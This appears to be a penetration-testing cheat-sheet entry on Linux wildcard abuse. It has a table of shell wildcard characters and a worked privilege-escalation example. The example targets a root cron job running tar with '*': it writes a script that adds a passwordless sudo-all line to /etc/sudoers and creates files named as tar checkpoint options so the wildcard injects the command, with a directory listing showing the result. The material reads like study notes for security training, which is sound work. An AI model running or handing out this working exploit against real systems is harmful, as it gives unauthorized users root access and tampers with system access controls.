Wildcard Abuse

Character	Significance
*	An asterisk that can match any number of characters in a file name.
?	Matches a single character.
[ ]	Brackets enclose characters and can match any single one at the defined position.
~	A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory.
-	A hyphen within brackets will denote a range of characters.

Sample Exploitation

1. Assuming that there is a cron

   #
   #
   mh dom mon dow command
   */01 * * * * cd /root && tar -zcf /tmp/backup.tar.gz *

2. Use this command (similar to the one in gtfobin)

   $ echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
   $ echo "" > "--checkpoint-action=exec=sh root.sh"
   $ echo "" > --checkpoint=1
   $ ls -la
   
   total 56
   drwxrwxrwt 10 root        root        4096 Aug 31 23:12 .
   drwxr-xr-x 24 root        root        4096 Aug 31 02:24 ..
   -rw-r--r--  1 root        root         378 Aug 31 23:12 backup.tar.gz
   -rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint=1
   -rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh
   drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .font-unix
   drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .ICE-unix
   -rw-rw-r--  1 cliff.moore cliff.moore   60 Aug 31 23:11 root.sh

3. Once the cronjob runs, we will gain root